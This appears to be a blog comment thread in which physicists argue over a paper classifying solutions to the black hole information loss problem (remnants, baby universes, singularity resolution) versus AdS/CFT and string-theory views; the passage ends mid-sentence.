But, if you are really close to an electron, well, you avoid the shielding and one finds such a strong EM field that you might find a mini black hole. So, instead of saying that you find a black hole, why not a bag of gold with a very strong EM field trapped inside? You'd get the concept of charge without relying on charge. Make the bag of gold spin, you get spin. I don't know if that is feasible. But it would be interesting to think about something similar to geometrodynamics, but without resorting to little wormholes, rather as defects with almost-trapped surfaces that could actually trap fields. I thought of this when I saw that one could find the residual of a black hole as a kind of bag of gold which is a kind of defect in space time which traps fields. There are ways to produce charges without charge. Check the last pages of Frank Wilczek's article, http://arxiv.org/abs/0812.5097, in which he also references this article: http://www.theory.caltech.edu/~preskill/ph219/topological.pdf Yes, your paper with Smolin is a good one, for two reasons: first, the emphasis on *reversibility*, reminding us that the problem really is a thermodynamic one in some sense; and second, the gentle reminder that claims that the solution is to be sought near the event horizon are "not conservative" --- which is a polite way of saying "completely ridiculous". However, here are two answers to your [or Lee Smolin's] question, namely: why hasn't the obvious solution [essentially, baby universes born inside black holes, as in cosmic natural selection] been followed up? The first reason is that nobody really knows *how* to follow it up! The second, and much better, reason is that there are very good reasons to think that baby universes [of this kind, i.e. born inside black holes] won't be like ours --- they won't begin in a state of low entropy. So it's hard to see what use they are for explaining anything in *our* universe, apart from solving the information loss problem. ps: as I said in your "monster" post, there are reasons to think that bags of gold don't exist in string theory. So that is an argument against remnants from a string point of view. pps: You only mentioned Horowitz and Maldacena in passing, but I think that their idea deserves a lot more attention. It has been generally dismissed for very inadequate reasons. All your conservative solutions macroscopically violate Einstein's equations, even in regions where the curvature is very low. Whether or not the singularity is "infinite" is completely irrelevant for the information loss puzzles. Even if it is regulated at short distances, which is how most people imagine it anyway (and the information questions really have nothing to do with the question whether this visualization is correct), the information gets destroyed there simply because there is no future-directed timelike trajectory from the vicinity of such a singularity to the exterior spacetime. The (semiclassical) destruction becomes inevitable at the moment of crossing the horizon, for purely causal reasons, and trying to "solve" the information loss puzzle afterwards is simply too late. Also, all the black hole information can't get away in the "last Planckian moment", or something like that. What does this option even mean for a large black hole? Should the black hole remember that it once used to be large, and recall all the information from those good old times when it was large, and emit all the information from those old times? What if it had some life before it as well? 
Should it remember the state from the beginning of the Universe? It makes no sense. Also, there are no numerous remnants because they would completely spoil the spectrum of the theory and would be produced generically. Baby Universe may look different for the infalling observers but they still look like remnants to the exterior world, so it is correct that you included them in the same category. This category is excluded, too. The macroscopic description of spacetime must clearly reproduce the diagram in your option (1), the only conservative solution, the only solution that macroscopically agrees with Einstein's equations, and the only solution that you don't call "conservative". What you're writing is just completely weird. Note that capitalist pig is doing everything he can throughout his life to be against me and with my foes but he can hardly hide that he is beginning to understand these basic issues about the (ir)relevance of the horizon and singularity, too. The corect solution is macroscopically (1) except that there are tiny "tunneling" effects that can imprint the detailed microstate into the Hawking radiation - fingerprints that are not visible semiclassically or in the whole perturbative expansion, for that matter. why hasn't the obvious solution [essentially, baby universes born inside black holes, as in cosmic natural selection] been followed up? The first reason is that nobody really knows *how* to follow it up! The second, and much better, reason, is that there are very good reasons to think that baby universes [of this kind, ie born inside black holes] won't be like ours --- they won't begin in a state of low entropy. So it's hard to see what use they are for explaining anything in *our* universe, apart from solving the information loss problem. Well, I am not a huge fan of the baby universe solution, but I think you are confusing two different things here. The baby universes in the sense we have discussed them in the paper are indeed not like our universe. To begin with, they are closed. And yes, they generically have a large entropy. But they are not supposed to be like our universe - I think you might have CNS in mind, but we haven't tried to make an argument about that. Yes, the use they have is they provide one solution to the information loss problem. I like the Horowitz and Maldacena idea, but their motivation could be stronger. I am sure we will hear more about that. Well, you don't need an infinite mass to create an infinite density. You just have to squeeze it together to one point. Now one would expect from quantum gravitational effects that this can't happen, thus no infinite densities, thus no singularities. I think almost everybody expects that quantum gravity will take care of the singularities in classical general relativity. I just think that the relevance of that for resolving the information loss problem has not been reflected well in the literature. Many attempts focus on the problem of how to shove the information through the horizon. Which, when done before the final stage, necessitates locality violations. The difference to the bottle you are comparing the black hole to is that the region inside the horizon is indeed causally disconnected from the outside. Also, radiation can very well fall into a black hole, it just can't come out. I think the analogy to a one-way membrane is quite helpful in this regard. Best, Bee: I'm not going to get into the conservative versus not conservative issue, those are just words. 
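A small quantitative footnote to that last reply (my own rough estimate, not a claim from the paper or from the comment): the scale at which quantum gravitational effects are commonly expected to take over is the Planck density,

\[
% Planck density, and the radius at which a collapsing solar mass would reach it.
\rho_{Pl} = \frac{m_{Pl}}{\ell_{Pl}^{3}} = \frac{c^{5}}{\hbar G^{2}} \approx 5\times 10^{96}\,\mathrm{kg/m^{3}},
\qquad
r\big(\rho_{Pl}\big) = \left(\frac{3 M_\odot}{4\pi\rho_{Pl}}\right)^{1/3} \approx 5\times 10^{-23}\,\mathrm{m}.
\]

So a collapsing solar mass would hit Planckian density while still being far from pointlike (and still some twelve orders of magnitude above the Planck length), which is why one can plausibly expect quantum gravity to intervene long before an actually infinite density is reached.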
In AdS/CFT we have a detailed understanding, backed up by a large body of calculations, demonstrating how apparent information loss comes about, how it is related to the horizon of the black hole (roughly, the infinite red shift makes the spectrum continuous), and how it is solved in the dual field theory which encodes all the fine details of the problems, neglected in GR. So, the situation has changed, and in my mind any other of the classic, well-known solutions to the problems has to be equally quantitative to earn my respect. Are there any new arguments for the "conservative" solutions, or at least new arguments against their well-known problems? But to one of your issues, how can anything happen at the horizon even if the curvatures are arbitrarily low. This is also well understood. In any quantum mechanical system with large degeneracies (as is typical for highly excited states), the following holds. If you calculate simple quantities, you in effect average over huge number of states, obtaining a thermodynamic averaged quantity. For those you can use perturbation theory, the effect of any perturbation on the level will be small. For detailed quantities like the correlations between macroscopic number of Hawking quanta, perturbation theory breaks down for arbitrarily small coupling. Same happen in this situation: for average thermodynamical quantities you can use GR, and to understand subtle issues to do with unitarity, quantum gravity is needed. Maybe it's because the existence of the horizon is what removes information from our universe. No horizon, no paradox. I am certainly not telling you what you are allowed to find paradoxical. But the horizon does not 'remove information from our universe' - it just avoids information can reach I^+, and as far as I am concerned not being able to access information in some region of spacetime is not particularly paradoxical. The problem is that if the black hole evaporates into purely thermal radiation, this region shrinks away and information does never come out (if radiation remained purely thermal that is). What is paradoxical is that blaming the loss of information on our lacking understanding of quantum gravity does not seem to be sufficient to solve the problem (for reasons that I am sure you are well aware of, explained in the above mentioned earlier post ). You could blame it on the singularity, but what's the point if singularities probably don't exist? The point we were making is that understanding the avoidance of singularities is necessary to solve the problem since it is actually the (classical) singularity where information gets finally destroyed. That does not mean it is sufficient though. The argument is simply as long as you have a singularity (in the sense defined) you have a problem. The horizon is only non-special for an observer already committed to passing through it - the free falling observer. For an observer capable of getting close and then retreating, it's a hell whose temperature (due to the Hawking effect) is asymptotic to infinity. Isn't that true? And if you'd have an observer with infinite acceleration in flat space he'd also see a hell of particles. So what's your point? Thanks for the link. I still don't see what this is good for. Does it help me to understand anything? Like, why are the masses of charged particles not continuous and have the values they have? Also, how do you get a solution with non-vanishing trace of the energy momentum tensor from stuffing EM fields into the bag? 
Best, I am sure you could answer all your questions if you would actually read the paper. I am not interested in fighting with you about terminology, but what you refer to as 'destruction' of information, is merely the event of it becoming unavailable to the observer at I^+. And yes, you are of course right, once you have crossed the event horizon you are stuck inside it, that's more or less the definition of horizon (which is also in the paper). Should the black hole remember that it once used to be large, and recall all the information from those good old times when it was large, and emit all the information from those old times? I am not sure what you mean with 'remember', but it simply stores everything that falls in, yes, from those old times. What if it had some life before it as well? Should it remember the state from the beginning of the Universe? It makes no sense. Things that don't make it inside the trapping horizon of course don't have to be stored. In our terminology the difference between baby universes and remnants is in their ADM mass. It's zero for the former, non-zero for the latter. But yes, they are related in that both are permanent and just keep the information. Ya okay, people have problems and use the horizon. Does it change the way the problem existed for them if they try and describe it another way? The Thing?:) The old version of string theory, pre-1995, had these first two features. It includes quantum mechanics and gravity, but the kinds of things we could calculate were pretty limited. All of a sudden in 1995, we learned how to calculate things when the interactions are strong. Suddenly we understood a lot about the theory. And so figuring out how to compute the entropy of black holes became a really obvious challenge. I, for one, felt it was incumbent upon the theory to give us a solution to the problem of computing the entropy, or it wasn't the right theory. Of course we were all gratified that it did.Black Holes and Beyond: Harvard's Andrew Strominger on String Theory Susskind presents the "Gedanken experiment" to summarize and bring us up to date. Of course, there is a lot history behind this. Does this understanding help too, "not cross paths with the singularity?" Maybe some might like the Klein bottle(rain drop) for a comparison then if it were ever the case that such an evolution to the singularity was just the "turning" inside out? :) Stefan… actually it was a coincidence, and from what you point out, a nice one. I don’t know anything about the mathematics of droplets, but it seems likely that there’d be a singularity, indeed. No, Dave did not talk about this, as far as I could tell. if the black hole were storing the information about all the matter that every fell into it, but were not losing this information as it evaporates, it would mean that such a black hole must be capable to store an arbitrarily high amount of information - it would have to accumulate everything that went into it, without losing it. Just think of a black hole that was absorbing and emitting matter for 5 billions years at the same rate. That would mean that pretty much arbitrarily small regions of space can carry arbitrarily high information. That's impossible - e.g. because the loop processes involving these new objects would always diverge. There are much less dramatic possibilities that can be easily excluded. For example, virtual effects of any remnants will drive Newton's constant to zero. 
Of course, in Matrix theory or the AdS/CFT, one can see that there are no remnants, no baby universes, and no unlimited storage of information in a black hole. But even if one chooses to ignore these "models" of quantum gravity as a qualitative template, the room to maneuvers is just incredibly constrained these days. Wow, I was at least assuming that your baby universes behaved as massive remnants for the exterior observers in the old Universe, too. Now you want the baby universes (that can carry all the information) to look like *massless* particles in the old Universe? That's really... bold. ;-) Infinitely many new massless particle species, right? Massless particles have a tremendous effects on physics. For example, massless bosons always cause long-range forces. You seem to be adding even more "conservative" (in your terminology - note how polite I am) items to your picture than what you have written in the article which is more incredible than before. I don't know. We actually haven't talked about that. I would be in favor of submitting it somewhere. However, as I also wrote in the post, the paper is a classification of solution attempts, not actually a new result. It's not the kind of paper I usually write, so not sure how difficult it would be to publish. It also serves its purpose well on the arxiv. Best, But to one of your issues, how can anything happen at the horizon even if the curvatures are arbitrarily low. This is also well understood. In any quantum mechanical system with large degeneracies (as is typical for highly excited states), the following holds. Why do I have highly excited states if the curvature is arbitrarily low? Best, I think it would really help if you would read the paper. Or at least my post. This would answer a lot of your questions, and save me a lot of time. if the black hole were storing the information about all the matter that every fell into it, but were not losing this information as it evaporates, it would mean that such a black hole must be capable to store an arbitrarily high amount of information - it would have to accumulate everything that went into it, without losing it. Just think of a black hole that was absorbing and emitting matter for 5 billions years at the same rate. Correct. That would mean that pretty much arbitrarily small regions of space can carry arbitrarily high information. They can have an arbitrarily large volume. That's impossible - e.g. because the loop processes involving these new objects would always diverge. If objects with an arbitrarily large volume would appear in loop-processes, which doesn't seem particularly plausible to me. But either way, the question of whether or not there can be an effective theory for such objects is discussed in the paper. Wow, I was at least assuming that your baby universes behaved as massive remnants for the exterior observers in the old Universe, too. Now you want the baby universes (that can carry all the information) to look like *massless* particles in the old Universe? That's really... bold. ;-) Infinitely many new massless particle species, right? Massless particles have a tremendous effects on physics. For example, massless bosons always cause long-range forces. You seem to be adding even more "conservative" (in your terminology - note how polite I am) items to your picture than what you have written in the article which is more incredible than before. No, these objects actually look like 'nothing' in the old universe. 
They have neither mass nor momentum, they are simply disconnected. From the viewpoint of an outside observer, a black hole is a state of an energy equaling its ADM mass. For large black holes this energy is large compared to the energy scale of fundamental excitation (the Planck mass). This is the origin of black hole thermodynamics, a generic highly excited state in a generic theory will have a thermodynamic description, as far as simple quantities are concerned. It is only when probing fine details that you need the microscopic description. To probe the microscopic details of any complicated system, black hole or gas in a room, you'd need to calculate very detailed quantity. For those detailed quantities perturbation theory tends to break down, at arbitrarily low couplings. This is a generic phenomena, so we should not be surprised that it is also true in the black hole context. BTW, what I was asking is whether the status of those conservative solutions has changed some in the last X years, where X could be your choice. I really don't know, those tend to be the solution favored by the relativity community. References would be appreciated. Not to put words in Moshe's mouth, but I think the trouble is that you don't seem to address the now standard and well-supported picture of the resolution of the information paradox. Namely, that Hawking radiation is not precisely thermal; there are correlations in the Hawking radiation which allow the information to escape, but they are small (e^-S, with S the black hole entropy), and don't show up in the semiclassical analysis. Everyone would agree that the singularity is a classical artifact, and that there is a well-defined nonsingular quantum evolution. The question is why is the semiclassical calculation misleading, and this is a question that can be asked entirely in the weak-curvature regime. The answer is that these small effects are not accounted for. The "highly excited state" we're concerned with here is the black hole itself, which has very high entropy; the classical analysis is coarse-graining all these states into one black hole, which is roughly speaking why it's giving you a thermal answer that overlooks the correlations. Why do I have highly excited states if the curvature is arbitrarily low? Well, black holes of a large mass are excited states because the more energy (=excitation) one adds to it, the more massive they become (by the mass conservation and by E=mc^2). More excited i.e. more massive black holes have a low curvature outside the horizon because this fact can be calculated from general relativity: the radius (of curvature or event horizon) scales like the mass in 4D (or a positive power in other dimensions). Time to return to Moshe's words. A very excited (massive) black holes has a large entropy i.e. many microstates. Averaging over them is a kind of thermodynamic limit that will represent the interior as being empty, even though the content of the BH interior depends on the microstate if one avoids the averaging. I've read your paper. Maybe the reason of my (and others') "opinions" about the black holes is different than not having read your paper? Just a speculative idea to consider! 
;-) If the baby universes look like nothing and get disconnected, then they don't exist for the observers in the old Universe and the information, as compared in the information loss puzzles (which is always comparing information in the same Universe, before the BH creation, and after its evaporation) is lost or not lost in the same way as if the baby universes were not there at all. They are not there, after all, in this case. Such disconnected universes have no impact on the information loss or preservation. Yes, it is probably not so surprising that these solutions tend to be favoured by the GR community. As far as I know there hasn't been much work on that since the mid 90s, except for Steve Hsu's recent papers (see earlier post). I think you are making some assumptions as to what the microstates of the black hole do describe. Besides this I don't understand how what you say explains how, microscopically, the information from an infalling piece of matter (quantum state, whatever) gets transferred into the outgoing radiation? I really like the "baby universe" idea. The remnant in the parent universe could be a Planck mass black hole aka graviton 4-pair that effectively creates a deadend in spacetime (a discrete spacetime). The information of a Planck mass black hole could very well be the information for an instanton big bang like ours (a Paola Zizzi idea). Yeah, what you consider conservative depends strongly on your background. If you think the geometrical description of classical GR is complete, you'd tend to favor solutions where this structure describes the situations very far from where it was ever tested, e.g in the interior of black holes, even if this leads to results which look very strange from ordinary quantum mechanics viewpoint. I don't know in precise detail how the information is transferred to the Hawking radiation. Then again, I don't know that for ordinary process like burning a piece of coal, and I trust that QM is fine with those processes on much less detailed evidence. That much less detailed evidence pretty much exists already for black holes in AdS space, though it is still interesting to phrase it in the gravitational language. these questions about progress in other directions can be pretty quickly answered e.g. by Google Scholar. Take e.g. black hole remnants. You will see a 2001 paper (Adler) arguing that something must be left by a new uncertainty principle, but they don't say much about the spectrum of the left things (so it could be just one particle). Otherwise, there are a dozen of high-cited papers of the type "If there were remnants, we could see them, they could be.... dark matter or whatever", but none of these papers seems to contain any model or theoretical evidence that the remnant picture makes sense. You will find Bekenstein, Banks, Strominger etc. among the top-cited authors with the keyword, and you may know what they think today. Similarly, you can browse through the baby universe papers. You will probably know quite a few. The others will be very similar to the Sabine Lee paper, as far as the content goes. The most famous star-like, no-horizon, no-singularity paper to modify the picture is probably by Ashtekar and Bojowald. You may look at it whether it will convince you that it contains some new evidence for anything. I have personally no idea why they think that they allowed the things from the BH interior to escape, completely changing the diagram. I haven't read every word of the paper but it just looks wrong. 
These were the three "conservative" solutions and I am afraid that you won't find any better papers to support these "conservative" choices. So I guess that you will silently agree that the "preference" of these "conservative" solutions by a whole "relativistic community" is due to nothing other than zeal. I think the trouble is that you don't seem to address the now standard and well-supported picture of the resolution of the information paradox. Well, the thing about the information loss is that people like to argue about it and everybody has his or her favourite solution. You evidently don't like that we haven't spent enough time discussing the one you like best. Sorry about that. Besides this, same question to you as to Moshe: how does the information, in that case, get microscopically from the infalling to the outgoing particle at the horizon? One more comment for Moshe: note that if the "conservative" terminology depends on the background, the communities have been reversed. Clearly, the normal macroscopic Penrose diagram of a black hole is "conservative" for us because it actually follows from general relativity. It is very strange for a relativist to deny it and consider this denial of relativity "conservative" according to his upbringing. It would be more logical for him to argue that the diagram is correct and the information is simply lost, just like Hawking did, by causality. I think you are making some assumptions as to what the microstates of the black hole do describe. I thought that microstates of a black hole describe microscopic states of an object called a black hole. They're vectors in the Hilbert space and their precise dynamics is described by the dynamical laws of a theory - e.g. a Hamiltonian. We can also ask whether we should love them or imagine them but these aspects are not a part of real science, are they? Besides this I don't understand how what you say explains how, microscopically, the information from an infalling piece of matter (quantum state, whatever) gets transferred into the outgoing radiation. Any glowing object imprints the detailed information about the microstate into the radiation, and a black hole is no different. The only reason that was thought to make it impossible was causality - the causal separation of the interior where the information was imagined to reside. But this causality turned out to be just an approximate feature arising from the averaging over all microstates. Individual microstates don't respect the causality, the "empty interior" picture of the black hole is not appropriate for them, and they get the information out in the very same way as a burning preprint. Well, the thing about the information loss is that people like to argue about it and everybody has his or her favourite solution. Has physics been reduced to sentiments and popularity polls, making the actual papers and evidence obsolete? That's very bad but fortunately in this particular case, the stringy picture wins, anyway. ;-) More excited, i.e. more massive, black holes have a low curvature outside the horizon because this fact can be calculated from general relativity: the radius (of curvature or event horizon) scales like the mass in 4D (or a positive power in other dimensions). Doesn't the curvature at the black hole horizon scale as M/R_h^3 ~ 1/M^2? Anyway, I certainly never questioned that the curvature is low at the horizon. Time to return to Moshe's words. A very excited (massive) black hole has a large entropy, i.e. many microstates.
Averaging over them is a kind of thermodynamic limit that will represent the interior as being empty, even though the content of the BH interior depends on the microstate if one avoids the averaging. According to what theory? I've read your paper. Maybe the reason for my (and others') "opinions" about black holes is something other than not having read your paper? Just a speculative idea to consider! ;-) In this case it is very depressing you weren't able to extract from the paper that baby universes disconnect from the externally flat region, since this is basically their definition. Moreover, the fact that their volume can be arbitrarily large seems to have somehow escaped you, even though we have spent several pages discussing that point. If the baby universes look like nothing and get disconnected, then they don't exist for the observers in the old Universe and the information, as compared in the information loss puzzles (which is always comparing information in the same Universe, before the BH creation, and after its evaporation), is lost or not lost in the same way as if the baby universes were not there at all. They are not there, after all, in this case. Such disconnected universes have no impact on the information loss or preservation. The point is that the evolution is unitary if you take into account the baby universes. It just looks non-unitary to the observer in the asymptotically flat region, because he has no access to part of the space-time, which results in his quantum state being mixed. The important thing about the baby universes is not that they "are not there" in the final state ("there" presumably meaning connected to the asymptotic region) but that they were there in the initial stage, and information ends up in them. "Well, you don't need an infinite mass to create an infinite density. You just have to squeeze it together to one point" Yes, I understood this before I said it, as I know that a point represents, in theory, a place with proximity (location) yet of no physical size, which when considered as part of the whole equates to what one gets when you divide something by zero. As I understand it, from the mathematical perspective this has it to be undefined, rather than infinite. I certainly won't belabor the point (no pun intended), yet I do see it as significant to differentiate undefined from infinite, for the former I see as paradoxical and therein perhaps wrong, while the latter I see as a limit which defines the absolute boundaries that can be considered. So as opposed to a point, if as you and others have contended we are limited to a definable size, then to achieve infinite density would require infinite mass. I'm sure this along with other considerations is what lies at the heart as to why many are convinced that a singularity cannot exist. "Also, radiation can very well fall into a black hole, it just can't come out. I think the analogy to a one-way membrane is quite helpful in this regard" Yes, as I said the analogy is crude, yet as you remind me, thinking about it as a Maxwell's Demon does lend it this one-way aspect. To be truthful I'm still hung up when information and (classical) entropy are taken as being one and the same, as the former relates more to me as specific (meaningful) ordering and the latter the process that serves to eliminate any such distinction as the limit is random, which in effect leaves no backwards trail to follow other than to be able to say what was before was more ordered.
This I find to be not merely trivial, but deceptive as opposed to what is normally imagined as what information truly constitutes. Anyway all this is truly interesting and, as I can tell from the sheer volume of post activity, highly contested. Whichever way it turns out to be, Black Holes and their implications certainly serve as a linchpin for future discovery. It is little wonder why above all else one of the things that bothered Einstein the most is that his theory inevitably leads to such implications. In that regard I'm currently reading John Moffat's new book "Reinventing Gravity". Perhaps this can offer additional thoughts on how the problem might be approached? Not that I would even consider such a challenge as I'm far from capable yet merely insatiably curious. By the way with all the comments I'm having difficulty being able to distinguish between "Peer Review" and "Peer Revile" :-) Sorry for the misunderstanding. You are right of course: if you can't squeeze matter into a point you need an infinite mass to get an infinite density. However, mathematically speaking infinities are nothing particularly worrisome. Infinity is a very well defined concept; one can deal with it very well. The worries with singularities are physical, not mathematical. What does it mean for something to be "really" infinite? Do such events exist? I don't know, honestly, but I think the general sense is that a singularity indicates the breakdown of the theory and signals that it has to be replaced by a more fundamental theory that can be trusted better. I didn't read John's book. Let me know what you think when you are done! Dear Sabine, happily enough, we agree that in 4D, the radius scales like the mass so the curvature scales like 1/M^2. Do you still agree that for large (heavy) black holes, the curvature is small? I don't know exactly what positive thing you had in mind but you had an apparent difficulty with Moshe's description of black holes as highly excited states with low curvature. According to what theory? According to any theory of quantum gravity - but if you don't find any papers with that statement, you may interpret the statement as my discovery, work in progress. ;-) It is very easy to see that many microstates of a black hole don't have an empty interior. For example, when a spaceship has just fallen into the black hole, there is a spaceship inside the black hole, so it is not true that all black hole microstates are empty inside. On the other hand, having a spaceship in a black hole is a nontrivial condition that chooses non-generic black hole microstates. The generic states can't have any spaceships and they look contrived. For example, the "fuzzballs" (including LLM bubbles in AdS) give very nontrivial profiles for black hole microstates. All these subtleties go away with the averaging which must clearly generate translation invariant physics, even locally, because the whole "ensemble" of microstates is clearly invariant under these things, and the empty BH interior is the only dynamics one can get in this way. Again, yes, it is plausible that not many people realize that things work in this way, even in the "stringy culture", but they will surely agree when they sort it in their heads. Baby universes: Again, if the Hawking radiation carries no information about the initial state, and the information is stored in some other Universe, then the definitions of the information loss problem say that the information has been lost.
More precisely, it has been lost for the physical observer. That's also why the information loss problem wasn't a problem before Hawking discovered the radiation: one could always say that the information was inside. The problem only became physical once the black hole could disappear because one could no longer argue that the information is in it. If you want to count the information in some completely different, physically inaccessible universe as "stored" or "preserved", you may also equally safely save your money in banks in another Universe that has disconnected from ours. Happy saving, Iceland may be better, after all. Let me explain the "empty black hole from averaging" differently. If one waits for a while, complicated excited bound states get "thermalized" - one gets generic microstates or their mixture out of pretty much any initial state. With the spaceship in mind, we have another way to describe what the "waiting" means for the black hole. The black hole simply sucks everything that is already inside, flying towards the singularity. After some time, in some appropriate coordinates, all these things are swallowed by the singularity and the interior is emptied. Also, the quasinormal modes (vibrations of the shape etc.) exponentially drop almost to zero. The black hole becomes spherical and empty. Microscopically, we saw that it must be the same thing as getting a typical microstate - or the average over pretty much all of them. That's roughly why the average over microstates must be equivalent to the empty interior. (Black holes are the fastest thermalizers in the world.) The opposite statement, that non-averaged microstates are not empty inside, can be seen with the spaceship - or with the fuzzballs, if you wish. A lot of the confusion about the information loss was caused by incorrect identification here. People often thought that all microstates still looked empty, or that the "spaceship inside" carried additional degrees of freedom besides the black hole microstates. Of course, it can't. The black hole microstates count all the possibilities that can exist inside the [stretched] horizon, so they already contain all configurations of spaceships, too. Averaging means "empty interior"; microstates are not empty and don't allow us to separate the interior from the outside world in the same way we do for empty black holes. (Generic BH microstates are much further from the empty BH than a BH with a spaceship.) You say "there are correlations in the Hawking radiation which allow the information to escape, but they are small (e^-S, with S the black hole entropy)". I understand that this is the conventional string theory wisdom. But if the correlations are exponentially small, how can they possibly carry more than an exponentially small amount of information? Is this explained anywhere? It is an easy calculation that they need to carry a lot more information than e^-S if the information is to escape. This may depend on your definition of exponentially small, which is an incredibly vague term. Your comment "Individual microstates don't respect the causality, the "empty interior" picture of the black hole is not appropriate for them, and they get the information out in the very same way as a burning preprint." reminds me very much of the famous Sydney Harris cartoon. I think you should be more explicit here in step two. Peter Shor: let us forget about the black hole and try to find out what the precise microstate of the air in your office is. There are many ways to find out, all highly theoretical.
They may involve making very detailed measurements, or finding very fine details (which are "exponentially small") of a few simple ones. Eventually you'd have to gain access to S bits of information, where S is the entropy of the system. This applies equally to the air in your office, or to the Hawking radiation emitted from a BH. Lubos: thanks for the references; you'd see my opinion by what I choose to work on... while we are on the subject, I am wondering what your preferred resolution of the paradox is, as phrased in the gravitational language. The term "exponentially small correlations" may be vague in the blog thread above and you may want to keep it vague - but you don't have to, if you follow me! ;-) If you open Maldacena's 2001 paper, a favorite one of Moshe, it explains, see e.g. the 5th line on page 14/20, that some correlations decrease exponentially fast. One can add an operator on a different - very separated and seemingly unimportant - boundary for similar exponential reasons but it is enough to restore unitarity, in a completely explicit way. This AdS eternal toy model has a different geometry than the Schwarzschild black hole in 4D but the problems and their solutions are morally isomorphic. You know, more generally (not related to Maldacena's paper directly), correlations may be exponentially small, but there are many types of correlators one can construct, and by combining them, they can carry sufficient information. Moshe: I thought everything I wrote above was about my preferred solution in the gravitational language. I just believe that the microstates are really similar to the fuzzball picture, i.e. very far from a black hole with an empty interior, and then it is like any other burning object. One can still imagine that the black hole is "mostly empty" inside, but this always assumes some averaging over microstates already. I agree with you. There can still be another picture that is consistent with all we say, like one based on the black hole final state - but I doubt this particular one. The fuzzball-like constructions also suggest that non-BPS black holes probably have stringy modes in the "interior" excited, not being just SUGRA solutions, so I don't really believe that a "purely gravitational" description can carry all the necessary information (or degrees of freedom). What do you say, if you simplify your testimony relative to things written above? ;-) Moshe and Lubos have already given answers, but just to be clear, you're right that for certain quantities a semiclassical, effective field theory sort of calculation will just be wrong by an order-one amount. But those are quantities that involve correlations among a large number of quanta of Hawking radiation. If you stick with a very simple quantity, like some two-point function, the corrections will be exponentially small. One can have some fun looking at N by N matrices and building simple toy quantum mechanics examples that illustrate such points.... One more clarification to Peter Shor: if you want to have a microscopic description of the air in your room, the easiest is to work in terms of the microscopic constituents. We have such an understanding of (Maldacena's version of) the information paradox for large black holes in AdS. However, the gravitational language is analogous to the thermodynamical description of the system. Describing the specific microscopic situation if you have access only to thermodynamic measurements is tough, because you tend to average over a huge number of states.
The information about the specific microscopic situation is encoded in exponentially small contributions to such average quantities. It is precisely because they are exponentially small that they carry a lot of information - there are a lot more possibilities to consider if you are more sensitive to fine detail. Just in case onymous is e.g. Joe Polchinski who would never dare to promote his own work, here is a relevant paper about the matrices as a toy model for black holes, Polchinski et al 2008. They show that at all orders in 1/N, probably analogous to orders in G_Newton, the information seems lost but it is preserved for finite N. Matrix quantum mechanics is popular as a toy model for BHs - and maybe more than a toy model - elsewhere, too. Susskind et al. 2008 argue that BHs, much like matrix models, are the fastest thermalizers. This link is no coincidence because matrix models are how states - and black holes are generic localized ones at an energy level - are described in Matrix theory. This paper by Susskind et al. suggests that the bits can "spread" over the horizon much like if all the possible links or synapses or what's the word between all the bits on the horizon existed - so the information on the horizon is stored like on an infinite-dimensional space, reducing a power-law growth of the thermalization time to a logarithm (a rough version of this scaling is sketched a bit further below). The misunderstanding is principally of my doing as I sometimes imagine that others will naturally fill in the blanks. As for Moffat's book I have not much to report as I've only just begun. What I find somewhat frustrating, primarily as it's time consuming, is that despite being nothing more than a novice I'm forced to read through many chapters of things with which I've long since been familiar; yet have no choice for fear I might miss some important detail if I skip further along to the meat of the matter. I can therefore only imagine how this must be for you and others who have this as their profession when picking up to read such a book. Perhaps like children's toys there should be a couple of versions written that would take this into consideration and be so identified. At least for the pro this constitutes simply reading the author's latest and/or most relevant papers. Then again, I really shouldn't complain as Moffat is lending an opportunity that those like myself would not have if he considered such projects as being a waste of effort and in that sense not worthwhile. Okay, then to begin with the introduction, "In 1916 Einstein published his new theory of gravity called general relativity. In 1919 the theory was validated by the observation of the bending of light during a solar eclipse, ..." Hi Bee, "Like, why are the masses of charged particles not continuous and have the values they have?" It would be constant because it would be bounded by the "mouth" of the bag. If the remnants of the black holes are stable, they should be pretty much "static" objects. I have no idea why there would be any leftover from the black hole. After all, the tiniest black hole should be a really heavy particle and decay into a shower of particles as fast as a Planck time. But, by admitting that it is a stable particle, I suppose it would be pretty natural if any particle is also a candidate for a residual black hole, and so, a bag of gold. This is, I think, another reasoning that would lead me to think that fermions have such a nature. "Also, how do you get a solution with non-vanishing trace of the energy momentum tensor from stuffing EM fields into the bag?"
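A rough version of the "power law versus logarithm" scaling mentioned in the matrix-model comment above - this is only an illustrative sketch of the fast-scrambler idea as I understand it, with schematic prefactors, not a quotation of anyone's result in this thread. For a system of S degrees of freedom coupled locally in d spatial dimensions, information spreads diffusively, so the time to mix the whole system grows like a power of its size,

t_diffusive ~ beta S^(2/d),

with beta the inverse temperature. The conjecture associated with the Susskind et al. paper is that black holes instead saturate a logarithmic bound,

t_scramble ~ (beta / 2 pi) ln S,

which for a macroscopic entropy S is enormously shorter - hence "the fastest thermalizers".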
I do not know whether anybody here said it already, but there is an easy way to see that the singularity is not the one to blame. There are examples of three dimensional black holes (in AdS3 space) which have no curvature singularity whatsoever (these objects have an event horizon) and yet the paradox exists. Therefore, the story is not related to what Bee is trying to say, and all the attempts to associate the physics with the singularity cannot hold water. It may be nice or sexy, but mathematically and physically we know it is wrong due to the existence (for more than a decade) of counterexamples (the BTZ black holes). A line of argument that is complementary to that taken by you and Lee in your paper is that if a theory of quantum gravity eliminates the occurrence of actual physical singularities that can destroy information, then that theory also rules out 'radical' solutions to the information paradox such as black hole complementarity. Black hole complementarity, as proposed by Susskind and others for instance, depends on the existence of a real singularity at r = 0 that destroys the information carried by an object passing through the horizon. If that information is not so destroyed, the 'complementary' copy of the information encoded on the stretched horizon can be collected and passed through the horizon to be compared with the original version at some later time -- in violation of the strictures against quantum cloning. The existence of an actual singularity is thus crucial for the viability of black hole complementarity. However, the general expectation is that a realistic theory of quantum gravity will not contain such actual singularities. Your 'conservative' solutions to the information paradox would seem to be not just a less 'radical' option, but actually the only option if there are no actual spacetime singularities in quantum gravity. 1. AdS is totally, utterly different from the real world. I find it very easy to believe that the AdS/CFT explanation of the information problem is *correct* for AdS black holes.....and yet *utterly irrelevant* to the solution of the problem in the real world [and that goes double for the amazingly hyped BTZ black holes --- in 3 spacetime dimensions! "Leaving aside the fact that the asymptotics are radically wrong, and so is the dimension, the BTZ black hole is *exactly like* a real black hole...." Please.]. All we have seen contra this is statements using the word "morally". For all we know, as based on actual calculations, the correct statement could be: "Unitarity is preserved for black holes in AdS, but not in dS". I'm not saying I believe this, just that *nothing* that has been said here provides any evidence against this statement. Note that the distinction between large and small AdS black holes is irrelevant -- please bear in mind that black holes are intrinsically global objects. This observation leads me to..... 